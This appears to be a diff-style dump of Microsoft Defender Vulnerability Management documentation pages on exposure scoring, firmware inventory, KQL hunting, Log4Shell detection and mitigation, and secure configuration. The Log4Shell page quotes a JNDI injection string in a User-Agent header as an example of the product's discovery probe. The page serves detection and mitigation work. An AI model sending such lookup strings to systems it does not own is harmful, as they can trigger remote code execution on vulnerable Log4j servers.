--- [Remediate vulnerabilities](tvm-remediation.md)-- [Security recommendations](tvm-security-recommendation.md)-- [Exposure score](tvm-exposure-score.md)-- [Microsoft Secure Score for Devices](tvm-microsoft-secure-score-devices.md)
security Tvm Exposure Score https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-exposure-score.md
- Title: Exposure score in Defender Vulnerability Management
-description: The Microsoft Defender Vulnerability Management exposure score reflects how vulnerable your organization is to cybersecurity threats.
-----
- - m365-security
- - Tier1
- Previously updated : 03/04/2022--
-# Exposure score in Defender Vulnerability Management
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 1 & 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan) -
-Your exposure score is visible in the [Defender Vulnerability Management dashboard](tvm-dashboard-insights.md) in the Microsoft Defender portal. It reflects how vulnerable your organization is to cybersecurity threats. Low exposure score means your devices are less vulnerable to exploitation.
--- Quickly understand and identify high-level takeaways about the state of security in your organization.-- Detect and respond to areas that require investigation or action to improve the current state.-- Communicate with peers and management about the impact of security efforts.-
-The card gives you a high-level view of your exposure score trend over time. Any spikes in the chart give you a visual indication of a high cybersecurity threat exposure that you can investigate further.
--
-Exposure score is broken down into the following levels:
--- 0-29: low exposure score-- 30-69: medium exposure score-- 70-100: high exposure score-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## How to use exposure score to reduce your vulnerability exposure
-
-When software weaknesses are identified, they're transformed into recommendations and prioritized based on risk to the organization. By remediating vulnerabilities with [security recommendations](tvm-security-recommendation.md) prioritized to reduce your exposure score, you can reduce your overall vulnerability exposure.
-
-To view security recommendations prioritized to reduce your exposure score:
-
-1. Go to the **Vulnerability management** navigation menu and select **Dashboard**
-2. Select **Improve score** on the **Exposure score** card
-
-The security recommendations page will open with a list of security recommendations prioritized by the potential impact on your exposure score. The higher the impact on lowering your exposure by implementing a recommendation, the less vulnerable you'll be to exploitation. For more information, see [security recommendations impact](tvm-security-recommendation.md#impact).
-
-Using the top security recommendations, which can be viewed in the [Defender Vulnerability Management dashboard](tvm-dashboard-insights.md) can also help you achieve this goal.
-
-## Related articles
--- [Security recommendations](tvm-security-recommendation.md)-- [Event timeline](threat-and-vuln-mgt-event-timeline.md)
security Tvm Hardware And Firmware https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-hardware-and-firmware.md
- Title: Firmware and hardware assessment
-description: Find out about the firmware and hardware installed in your environment
-----
- - m365-security
- Previously updated : 08/01/2023--
-# Hardware and firmware assessment
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)--
-> [!NOTE]
-> To use this feature you'll require Microsoft Defender Vulnerability Management Standalone or if you're already a Microsoft Defender for Endpoint Plan 2 customer, the Defender Vulnerability Management add-on.
-
-Firmware and hardware attacks are on the rise. Attackers are increasingly targeting firmware and device drivers of hardware components to gain high privilege and persistence. Visibility into the threat posture of your firmware and hardware, and timely remediation of identified vulnerabilities is a vital part of keeping your organization secure.
-
-Microsoft Defender Vulnerability Management hardware and firmware assessment provides a list of known hardware and firmware in your organization. It provides individual inventories for system models, processors, and BIOS. Each view includes details such as the name of the vendor, number of weaknesses, threats insights, and the number of exposed devices.
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## View your hardware and firmware
-
-To access the hardware and firmware assessment page:
-
-1. Go to **Vulnerability management** \> **Inventories** in the [Microsoft Defender portal](https://security.microsoft.com).
-2. Select the **Hardware and Firmware** tab.
-
-The **Hardware and Firmware** page opens with individual pages available for:
--- [Laptop, desktop, and server models inventory](#laptop-desktop-and-server-models-inventory)-- [Processor inventory](#processor-inventory)-- [BIOS inventory](#bios-inventory)-
-> [!NOTE]
-> Weaknesses and exposed devices information is based on security advisories from HP, Dell, and Lenovo and relates to processors and BIOS only. Weaknesses for other vendors are not reported.
->
-> Inventory and weaknesses data is collected on Windows, Linux, and MacOS (refer to the [list of supported platforms](tvm-supported-os.md)).
->
-> **Note**: processor and BIOS information is not reported on Mac devices with M1 and M2 processors.
-
-### Laptop, desktop, and server models inventory
-
-Select the **Laptop, desktop, and server models** page to see a list of all system models in the organization.
-
- :::image type="content" source=" ../../media/defender-vulnerability-management/firmware-laptop-desktop-server-modals.png" alt-text="Screenshot of the Laptop, desktop, and server models page" lightbox=" ../../media/defender-vulnerability-management/firmware-laptop-desktop-server-modals.png":::
-
-At the top of the page, you can view the number of models per vendor.
-
-When you select a model from the list, a flyout panel will open with the model software details.
-
-### Processor inventory
-
-Select the **Processors** page to see a list of all processors in the organization.
-
- :::image type="content" source="../../media/defender-vulnerability-management/processors.png" alt-text="Screenshot of the Processors page" lightbox="../../media/defender-vulnerability-management/processors.png":::
-
-At the top of the page, you can view the number of processors per vendor.
-
-When you select a processor from the list, a flyout panel will open with the processor software details.
-
-### BIOS inventory
-
-Select the **BIOS** page to view a list of all BIOS firmware in the organization.
-
- :::image type="content" source="../../media/defender-vulnerability-management/bios-inventory.png" alt-text="Screenshot of the BIOS page" lightbox="../../media/defender-vulnerability-management/bios-inventory.png":::
-
-At the top of the page, you can view the number of BIOS per vendor.
-
-### View BIOS firmware details
-
-To view more details on a BIOS firmware:
-
-1. Open the **Hardware and Firmware** page in the [Microsoft Defender portal](https://security.microsoft.com/vulnerability-management-inventories/hardwareAndFirmware)
-2. Select the BIOS page and choose a BIOS in the list to open a flyout panel.
-3. Select **Open firmware page** to view more details about the BIOS firmware.
-
- :::image type="content" source="../defender-vulnerability-management/media/image7.png" alt-text="Screenshot of BIOS firmware details" lightbox="../defender-vulnerability-management/media/image7.png":::
-
-You can select the **Version distribution** tab to see BIOS versions that are deployed in the organization.
-
-### Get more information on missing security updates
-
-Select the **Missing security updates** tab to see the security updates that should be installed on the device to remediate discovered BIOS vulnerabilities.
-
-When you select an item from the list, a flyout panel will open with a link to the BIOS vendor advisory, a list of exposed devices, and a list of CVEs.
-
- :::image type="content" source="../defender-vulnerability-management/media/image11.png" alt-text="Screenshot missing security updates details" lightbox="../defender-vulnerability-management/media/image11.png":::
-
-## Hardware and firmware on devices
-
-To view the system model, processor, and BIOS information on the device page, select the device from the **Installed devices** tab and in the flyout panel and select **Open device page** or select the device directly from the Device inventory page.
-
- :::image type="content" source="../defender-vulnerability-management/media/image12.png" alt-text="Screenshot of the hardware and firmware on the device page" lightbox="../defender-vulnerability-management/media/image12.png":::
-
-Select **See all details** to get a flyout panel with more information.
-
-## Find processor and BIOS weaknesses
-
-To actively search for processor and BIOS weaknesses:
-
-1. Go to **Vulnerability management** \> **Weaknesses** in the [Microsoft Defender portal](https://security.microsoft.com).
-2. Search for 'BIOS' CVEs that relate to the processor or BIOS will be returned.
-3. Select an item from the list to open a flyout panel with more details on the CVE.
-
-On individual devices view processor and BIOS CVEs by selecting the **Discovered vulnerabilities** tab. Select a CVE to see a flyout panel with more information:
-
- :::image type="content" source="../defender-vulnerability-management/media/bios-vulnerability-details.png" alt-text="Screenshot of the bios-vulnerability-details page per device" lightbox="../defender-vulnerability-management/media/bios-vulnerability-details.png":::
-
-## Recommendations for firmware updates
-
-To actively search for firmware recommendations:
-
-1. Go to **Vulnerability management** \> **Recommendations** in the [Microsoft Defender portal](https://security.microsoft.com).
-2. Filter on Remediation type 'Firmware update'.
-
-Recommendations will appear to update a specific BIOS version if it's installed on at least 5% of devices across all organizations.
-
- :::image type="content" source="../defender-vulnerability-management/media/image16.png" alt-text="Screenshot of firmware recommendations page" lightbox="../defender-vulnerability-management/media/image16.png":::
-
-### UEFI Secure Boot mode recommendations
-
-Defender Vulnerability Management finds devices where UEFI Secure Boot mode is disabled and recommends enabling it.
-
-To find these recommendations, search for 'scid-2100' or 'boot' in the recommendations page. On selecting a recommendation, a flyout panel will open with more information:
-
- :::image type="content" source="../defender-vulnerability-management/media/image18.png" alt-text="Screenshot of UEFI Secure Boot mode recommendations" lightbox="../defender-vulnerability-management/media/image18.png":::
-
-> [!NOTE]
-> This capability is currently supported only on Windows.
-
-## Advanced Hunting
-
-You can use advanced hunting queries to gain visibility on hardware and firmware in your organization. Find details about the hardware and firmware installed per device in the **DeviceTvmHardwareFirmware** table. This table contains hardware and firmware information per device, including system model, processor, and BIOS.
-
-For more information, see [advanced hunting](../defender/advanced-hunting-devicetvmhardwarefirmware-table.md).
-
-## Hardware and firmware API
-
-You can use APIs to view all hardware and firmware installed in your organization, including component type, vendor, and version.
--- [Export firmware and hardware assessment per device](../defender-endpoint/export-firmware-hardware-assessment.md)-
-## Related articles
--- [Vulnerabilities in my organization](tvm-weaknesses.md)-- [Advanced hunting schema reference](../defender-endpoint/advanced-hunting-schema-reference.md)-- [Security recommendations](tvm-end-of-support-software.md)
security Tvm Hunt Exposed Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-hunt-exposed-devices.md
- Title: Hunt for exposed devices
-description: Learn how Microsoft Defender Vulnerability Management can be used to help security admins, IT admins, and SecOps collaborate.
-----
- - m365-security
- - Tier1
- Previously updated : 03/04/2022--
-# Hunt for exposed devices
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 1 & 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan) -
-## Use advanced hunting to find devices with vulnerabilities
-
-Advanced hunting is a query-based threat-hunting tool that lets you explore up to 30 days of raw data. You can proactively inspect events in your network to locate threat indicators and entities. The flexible access to data enables unconstrained hunting for both known and potential threats. to Learn more about advanced hunting, see [Advanced hunting overview](../defender-endpoint/advanced-hunting-overview.md).
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-### Schema tables
--- [DeviceTvmSoftwareInventory](../defender/advanced-hunting-devicetvmsoftwareinventory-table.md) - Inventory of software installed on devices, including their version information and end-of-support status.--- [DeviceTvmSoftwareVulnerabilities](../defender/advanced-hunting-devicetvmsoftwarevulnerabilities-table.md) - Software vulnerabilities found on devices and the list of available security updates that address each vulnerability.-- [DeviceTvmSoftwareVulnerabilitiesKB](../defender/advanced-hunting-devicetvmsoftwarevulnerabilitieskb-table.md) - Knowledge base of publicly disclosed vulnerabilities, including whether exploit code is publicly available.--- [DeviceTvmSecureConfigurationAssessment](../defender/advanced-hunting-devicetvmsecureconfigurationassessment-table.md) - Defender Vulnerability Management assessment events, indicating the status of various security configurations on devices.--- [DeviceTvmSecureConfigurationAssessmentKB](../defender/advanced-hunting-devicetvmsecureconfigurationassessmentkb-table.md) - Knowledge base of various security configurations used by Defender Vulnerability Management to assess devices; includes mappings to various standards and benchmarks-- [DeviceTvmInfoGathering](../defender/advanced-hunting-devicetvminfogathering-table.md) - Assessment events including the status of various configurations and attack surface area states of devices-- [DeviceTvmInfoGatheringKB](../defender/advanced-hunting-devicetvminfogatheringkb-table.md) - List of various configuration and attack surface area assessments used by Defender Vulnerability Management information gathering to assess devices-
-## Check which devices are involved in high severity alerts
-
-1. Go to **Hunting** \> **Advanced hunting** from the left-hand navigation pane of the Microsoft Defender portal.
-
-2. Scroll through advanced hunting schemas to familiarize yourself with the column names.
-
-3. Enter the following queries:
-
- ```kusto
- // Search for devices with High active alerts or Critical CVE public exploit
- let DeviceWithHighAlerts = AlertInfo
- | where Severity == "High"
- | project Timestamp, AlertId, Title, ServiceSource, Severity
- | join kind=inner (AlertEvidence | where EntityType == "Machine" | project AlertId, DeviceId, DeviceName) on AlertId
- | summarize HighSevAlerts = dcount(AlertId) by DeviceId;
- let DeviceWithCriticalCve = DeviceTvmSoftwareVulnerabilities
- | join kind=inner(DeviceTvmSoftwareVulnerabilitiesKB) on CveId
- | where IsExploitAvailable == 1 and CvssScore >= 7
- | summarize NumOfVulnerabilities=dcount(CveId),
- DeviceName=any(DeviceName) by DeviceId;
- DeviceWithCriticalCve
- | join kind=inner DeviceWithHighAlerts on DeviceId
- | project DeviceId, DeviceName, NumOfVulnerabilities, HighSevAlerts
- ```
-
-## Related topics
--- [Security recommendations](tvm-security-recommendation.md)-- [Configure data access for Defender Vulnerability Management roles](../defender-endpoint/user-roles.md#create-roles-and-assign-the-role-to-an-azure-active-directory-group)-- [Advanced hunting overview](/windows/security/threat-protection/microsoft-defender-atp/advanced-hunting-overview)-- [All advanced hunting tables](/microsoft-365/security/defender-endpoint/advanced-hunting-schema-reference)
security Tvm Manage Log4shell Guidance https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-manage-Log4shell-guidance.md
- Title: Learn how to mitigate the Log4Shell vulnerability in Microsoft Defender for Endpoint - Defender Vulnerability Management
-description: Learn how to mitigate the Log4Shell vulnerability in Microsoft Defender for Endpoint
--- NOCSH----
- - M365-security
- - tier2
-- Previously updated : 06/29/2022--
-# Learn how to manage the Log4Shell vulnerability in Microsoft Defender for Endpoint
-
-The Log4Shell vulnerability is a remote code execution (RCE) vulnerability found in the Apache Log4j 2 logging library. As Apache Log4j 2 is commonly used by many software applications and online services, it represents a complex and high-risk situation for companies across the globe. Referred to as "Log4Shell" ([CVE-2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228), [CVE-2021-45046](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046)) it introduces a new attack vector that attackers can exploit to extract data and deploy ransomware in an organization.
-
-> [!NOTE]
-> Refer to the blogs [Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability and](https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/) [Microsoft Security Response Center](https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/) for guidance and technical information about the vulnerability and product specific mitigation recommendations to protect your organization.
-
-## Overview of discovery, monitoring and mitigation capabilities
-
-Defender Vulnerability Management provides you with the following capabilities to help you identify, monitor, and mitigate your organizational exposure to the Log4Shell vulnerability:
--- **Discovery**: Detection of exposed devices, both Microsoft Defender for Endpoint onboarded devices as well as devices that have been discovered but aren't yet onboarded, is based on vulnerable software and vulnerable files detected on disk.-- **Threat awareness:** A consolidated view to assess your organizational exposure. This view shows your exposure at the device level and software level, and provides access to details on vulnerable files like, the last time it was seen, the last time it was executed and the last time it was executed with open ports. You can use this information to prioritize your remediation actions. It can take up to 24 hours for data related to exposed devices to appear on the dashboard.-- **Mitigation options:** Apply mitigation options to help lower your exposure risk.-- **Advanced hunting:** Use advanced hunting to return details for vulnerable log4j files identified on disk.-
-> [!NOTE]
-> These capabilities are supported on Windows 10 & Windows 11, Windows Server, Linux and macOS.
->
-> Support on Linux requires Microsoft Defender for Endpoint Linux client version 101.52.57 (30.121092.15257.0) or later.
->
-> Support on macOS requires Microsoft Defender for Endpoint macOS client version 20.121111.15416.0 or later.
->
-> For more information on supported versions, see [Supported operating systems platforms and capabilities](tvm-supported-os.md).
-
-## Exposed devices discovery
-
-Embedded Defender Vulnerability Management capabilities, along with enabling Log4j detection, in the Microsoft Defender portal, will help you discover devices exposed to the Log4Shell vulnerability.
-
-Onboarded devices, are assessed using existing embedded Defender Vulnerability Management capabilities that can discover vulnerable software and files.
-
-For detection on discovered but not yet onboarded devices, Log4j detection must be enabled. This will initiate probes in the same way device discovery actively probes your network. This includes probing from multiple onboarded endpoints (Windows 10+ and Windows Server 2019+ devices) and only probing within subnets, to detect devices that are vulnerable and remotely exposed to CVE-2021-44228.
-
-To enable Log4 detection:
-
-1. Go to **Settings** > **Device discovery** > **Discovery setup**.
-2. Select **Enable Log4j2 detection (CVE-2021-44228)**.
-3. Select **Save**.
--
-Running these probes will trigger the standard Log4j flow without causing any harmful impact on either the device being probed or the probing device. The probing itself is done by sending multiple HTTP requests to discovered devices, targeting common web application ports (for example - 80,8000,8080,443,8443) and URLs. The request contains HTTP headers with a JNDI payload that triggers a DNS request from the probed machine.
-
-For example, User-Agent: ${jndi:dns://192.168.1.3:5353/MDEDiscoveryUser-Agent} where 192.168.1.3 is the IP of the probing machine.
-
-> [!NOTE]
-> Enabling Log4j2 detection also means onboarded devices will use self-probing to detect local vulnerabilities.
-
-## Vulnerable software and files detection
-
-Defender Vulnerability Management provides layers of detection to help you discover:
--- **Vulnerable software**: Discovery is based on installed application Common Platform Enumerations (CPE) that are known to be vulnerable to Log4j remote code execution.-- **Vulnerable files:** Both files in memory and files in the file system are assessed. These files can be Log4j-core jar files with the known vulnerable version or an Uber-JAR that contains either a vulnerable jndi lookup class or a vulnerable log4j-core file. Specifically, it:-
- - determines if a JAR file contains a vulnerable Log4j file by examining JAR files and searching for the following file:
- \\META-INF\\maven\\org.apache.logging.log4j\\log4j-core\\pom.properties - if this file exists, the Log4j version is read and extracted.
- - searches for the JndiLookup.class file inside the JAR file by looking for paths that contain the string "/log4j/core/lookup/JndiLookup.class" - if the JndiLookup.class file exists, Defender Vulnerability Management determines if this JAR contains a Log4j file with the version defined in pom.properties.
- - searches for any vulnerable Log4j-core JAR files embedded within a nested-JAR by searching for paths that contain any of these strings:
- - lib/log4j-core-
- - WEB-INF/lib/log4j-core-
- - App-INF/lib/log4j-core-
-
-This table describes the search capabilities supported platforms and versions:
-
-|Capability|File Type|Windows10+,<br>server2019+|Server 2012R2,<br>server2016|Server 2008R2|Linux + macOS|
-|:|:|:|:|:|:|
-|Search In Memory | Log4j-core | Yes |Yes<sup>[1]| - | Yes |
-| |Uber-JARs | Yes |Yes<sup>[1]| - | Yes |
-| Search all files on disk |Log4j-core | Yes |Yes<sup>[1]| Yes | - |
-| | Uber-JARs|Yes |Yes<sup>[1]| - | -|
-
-(1) Capabilities are available when [KB5005292](https://support.microsoft.com/topic/microsoft-defender-for-endpoint-update-for-edr-sensor-f8f69773-f17f-420f-91f4-a8e5167284ac) is installed on Windows Server 2012 R2 and 2016.
-
-## Learn about your Log4Shell exposure and mitigation options
-
-1. In the Microsoft Defender portal, go to **Vulnerability management** > **Weaknesses**.
-2. Select **CVE-2021-44228**.
-3. Select **Open vulnerability page**.
---
-### Log4Shell vulnerability mitigation
-
-The log4Shell vulnerability can be mitigated by preventing JNDI lookups on Log4j versions 2.10 - 2.14.1 with default configurations. To create this mitigation action, from the **Threat awareness dashboard**:
-
-1. Select **View vulnerability details**.
-2. Select **Mitigation options**.
-
-You can choose to apply the mitigation to all exposed devices or select specific onboarded devices. To complete the process and apply the mitigation on devices, select **Create mitigation action**.
--
-### Mitigation status
-
-The mitigation status indicates whether the workaround mitigation to disable JDNI lookups has been applied to the device. You can view the mitigation status for each affected device in the Exposed devices tabs. This can help prioritize mitigation and/or patching of devices based on their mitigation status.
--
-The table below lists the potential mitigation statuses:
-
-| Mitigation status | Description |
-|:|:|
-| Workaround applied | _Windows_: The LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable was observed before latest device reboot. <br/><br/> _Linux + macOS_: All running processes have LOG4J_FORMAT_MSG_NO_LOOKUPS=true in its environment variables. |
-| Workaround pending reboot | The LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable is set, but no following reboot detected. |
-| Not applied | _Windows_: The LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable wasn't observed. <br/><br/> _Linux + macOS_: Not all running processes have LOG4J_FORMAT_MSG_NO_LOOKUPS=true in its environment variables, and mitigation action wasn't applied on device. |
-| Partially mitigated | _Linux + macOS_: Although mitigation action was applied on device, not all running processes have LOG4J_FORMAT_MSG_NO_LOOKUPS=true in its environment variables. |
-|Not applicable | Devices that have vulnerable files that aren't in the version range of the mitigation. |
-|Unknown | The mitigation status couldn't be determined at this time. |
-
-> [!NOTE]
-> It may take a few hours for the updated mitigation status of a device to be reflected.
-
-### Revert mitigations applied for the Log4Shell vulnerability
-
-In cases where the mitigation needs to be reverted, follow these steps:
-
-**_For Windows:_**
-
-1. Open an elevated PowerShell window.
-2. Run the following command:
-
- ```Powershell
- [Environment]::SetEnvironmentVariable("LOG4J\_FORMAT\_MSG\_NO\_LOOKUPS", $null,[EnvironmentVariableTarget]::Machine)
-```
-
-The change will take effect after the device restarts.
-
-**_For Linux:_**
-
-1. Open the file /etc/environment and delete the line LOG4J\_FORMAT\_MSG\_NO\_LOOKUPS=true
-2. Delete the file /etc/systemd/system.conf.d/log4j\_disable\_jndi\_lookups.conf
-3. Delete the file /etc/systemd/user.conf.d/log4j\_disable\_jndi\_lookups.conf
-
-The change will take effect after the device restarts.
-
-**_For macOS:_**
-
-Remove the file setenv.LOG4J\_FORMAT\_MSG\_NO\_LOOKUPS.plist from the following folders:
--- */Library/LaunchDaemons/*-- */Library/LaunchAgents/*-- */Users/\[username\]/Library/LaunchAgents/ - for all users*-
-The change will take effect after the device restarts.
-
-### Apache Log4j security recommendations
-
-To see active security recommendation related to Apache log4j, select the **Security recommendations** tab from the vulnerability details page. In this example, if you select **Update Apache Log4j** you'll see another flyout with more information:
--
-Select **Request remediation** to create a remediation request.
-
-<a name='explore-the-vulnerability-in-the-microsoft-365-defender-portal'></a>
-
-## Explore the vulnerability in the Microsoft Defender portal
-
-Once exposed devices, files and software are found, relevant information will also be conveyed through the following experiences in the Microsoft Defender portal:
-
-### Software inventory
-
- On the software inventory page, search for **CVE-2021-44228** to see details about the Log4j software installations and exposure:
--
-### Weaknesses
-
-On the weaknesses page, search for **CVE-2021-44228** to see information about the Log4Shell vulnerability:
--
-## Use advanced hunting
-
-You can use the following advanced hunting query to identify vulnerabilities in installed software on devices:
-
- ```text
- DeviceTvmSoftwareVulnerabilities
- | where CveId in ("CVE-2021-44228", "CVE-2021-45046")
- ```
-
-You can use the following advanced hunting query to identify vulnerabilities in installed software on devices to surface file-level findings from the disk:
-
- ```text
- DeviceTvmSoftwareEvidenceBeta
- | mv-expand DiskPaths
- | where DiskPaths contains "log4j"
- | project DeviceId, SoftwareName, SoftwareVendor, SoftwareVersion, DiskPaths
- ```
-
-## Related articles
--- [What is Defender Vulnerability Management](/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management)-- [Security recommendations](tvm-security-recommendation.md)
security Tvm Microsoft Secure Score Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-microsoft-secure-score-devices.md
- Title: Microsoft Secure Score for Devices
-description: Your score for devices shows the collective security configuration state of your devices across application, operating system, network, accounts, and security controls.
-----
- - m365-security
- - Tier1
- Previously updated : 03/04/2022--
-# Microsoft Secure Score for Devices
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 1 & 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
-> [!NOTE]
-> Configuration score is now part of vulnerability management as Microsoft Secure Score for Devices.
-
-Your score for devices is visible in the [Defender Vulnerability Management dashboard](tvm-dashboard-insights.md) of the Microsoft Defender portal. A higher Microsoft Secure Score for Devices means your endpoints are more resilient from cybersecurity threat attacks. It reflects the collective security configuration state of your devices across the following categories:
--- Application-- Operating system-- Network-- Accounts-- Security controls-
-Select a category to go to the [**Security recommendations**](tvm-security-recommendation.md) page and view the relevant recommendations.
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## How it works
-
-> [!NOTE]
-> Microsoft Secure Score for Devices currently supports configurations set via Group Policy. Due to the current partial Intune support, configurations which might have been set through Intune might show up as misconfigured. Contact your IT Administrator to verify the actual configuration status in case your organization is using Intune for secure configuration management.
-
-The data in the Microsoft Secure Score for Devices card is the product of meticulous and ongoing vulnerability discovery process. It is aggregated with configuration discovery assessments that continuously:
--- Compare collected configurations to the collected benchmarks to discover misconfigured assets-- Map configurations to vulnerabilities that can be remediated or partially remediated (risk reduction)-- Collect and maintain best practice configuration benchmarks (vendors, security feeds, internal research teams)-- Collect and monitor changes of security control configuration state from all assets-
-## Improve your security configuration
-
-Improve your security configuration by remediating issues from the security recommendations list. As you do so, your Microsoft Secure Score for Devices improves and your organization becomes more resilient against cybersecurity threats and vulnerabilities.
-
-1. From the Microsoft Secure Score for Devices card in the Defender Vulnerability Management dashboard, select one of the categories. You'll view the list of recommendations related to that category. It will take you to the [**Security recommendations**](tvm-security-recommendation.md) page. If you want to see all security recommendations, once you get to the Security recommendations page, clear the search field.
-
-2. Select an item on the list. The flyout panel will open with details related to the recommendation. Select **Remediation options**.
-
- :::image type="content" alt-text="Security controls related security recommendations." source="../../media/defender-vulnerability-management/security-controls.png":::
-
-3. Read the description to understand the context of the issue and what to do next. Select a due date, add notes, and select **Export all remediation activity data to CSV** so you can attach it to an email for follow-up.
-
-4. **Submit request**. You'll see a confirmation message that the remediation task has been created.
-
- :::image type="content" alt-text="Remediation task creation confirmation." source="../../media/defender-vulnerability-management/remediation-task-created.png":::
-
-5. Send a follow-up email to your IT Administrator and allow the time that you've allotted for the remediation to propagate in the system.
-
-6. Review the **Microsoft Secure Score for Devices** card again on the dashboard. The number of security controls recommendations will decrease. When you select **Security controls** to go back to the **Security recommendations** page, the item that you've addressed won't be listed there anymore. Your Microsoft Secure Score for Devices should increase.
-
-> [!IMPORTANT]
-> To boost your vulnerability assessment detection rates, download the following mandatory security updates and deploy them in your network:
->
-> - 19H1 customers | [KB 4512941](https://support.microsoft.com/help/4512941/windows-10-update-kb4512941)
-> - RS5 customers | [KB 4516077](https://support.microsoft.com/help/4516077/windows-10-update-kb4516077)
-> - RS4 customers | [KB 4516045](https://support.microsoft.com/help/4516045/windows-10-update-kb4516045)
-> - RS3 customers | [KB 4516071](https://support.microsoft.com/help/4516071/windows-10-update-kb4516071)
->
-> To download the security updates:
->
-> 1. Go to [Microsoft Update Catalog](https://www.catalog.update.microsoft.com/home.aspx).
-> 2. Key-in the security update KB number that you need to download, then click **Search**.
-
-## Related topics
--- [Dashboard](tvm-dashboard-insights.md)-- [Exposure score](tvm-exposure-score.md)-- [Security recommendations](tvm-security-recommendation.md)
security Tvm Network Share Assessment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-network-share-assessment.md
- Title: Network share configuration assessment
-description: Learn review recommendations related to network shares in your environment through vulnerability management.
-----
- - m365-security
- - Tier2
- Previously updated : 03/01/2023--
-# Network share configuration assessment
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
-> [!NOTE]
-> To use this feature you'll require Microsoft Defender Vulnerability Management Standalone or if you're already a Microsoft Defender for Endpoint Plan 2 customer, the Defender Vulnerability Management add-on.
-
-The ability to share files and folders over a network allows users to provide access to resources like files, documents, and media to other people on the network. As network shares can be easily accessed by network users, some common weaknesses exist that can cause network shares to be vulnerable.
-
-When vulnerable network share configurations are identified, they're mapped to actionable security recommendations in the Security recommendations page. The following recommendations can help protect against vulnerabilities in network shares that could be exploited by attackers:
--- Disallow offline access to shares-- Remove shares from the root folder-- Remove share write permission set to 'Everyone'-- Set folder enumeration for shares-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## Find information about exposed network shares
-
-To see security recommendations addressing network share configurations:
-
-1. Go to **Vulnerability management** > **Recommendations**.
-2. Select **Filters** and choose **Related component** > **OS > Shares**.
--
-3. Select **Apply**.
-
-If there are network shares with vulnerabilities to address, they'll appear in the list of recommendations
--
-Select a recommendation to see a flyout with information on the vulnerable network share configuration:
--
-Explore the **Exposed devices** and **Exposed shares** tabs for details of the exposed entities in your organization.
-
-## Request remediation for the network share configuration
-
-You can view and submit a remediation request from the remediation options tab:
--
-## View configuration remediation activities
-
-Go to **Vulnerability management** > **Remediation** and filter by the remediation type, "configuration change" to see the activity item related to this change.
-
-## Related articles
--- [Security recommendations](tvm-security-recommendation.md)-- [Vulnerabilities in my organization](tvm-weaknesses.md)
security Tvm Prerequisites https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-prerequisites.md
- Title: Prerequisites & permissions for Microsoft Defender Vulnerability Management
-description: Before you begin using Microsoft Defender Vulnerability Management, make sure you have the relevant configurations and permissions.
------- m365-security-- tier2-- essentials-get-started- Previously updated : 03/04/2022--
-# Prerequisites & permissions for Microsoft Defender Vulnerability Management
-
-> [!NOTE]
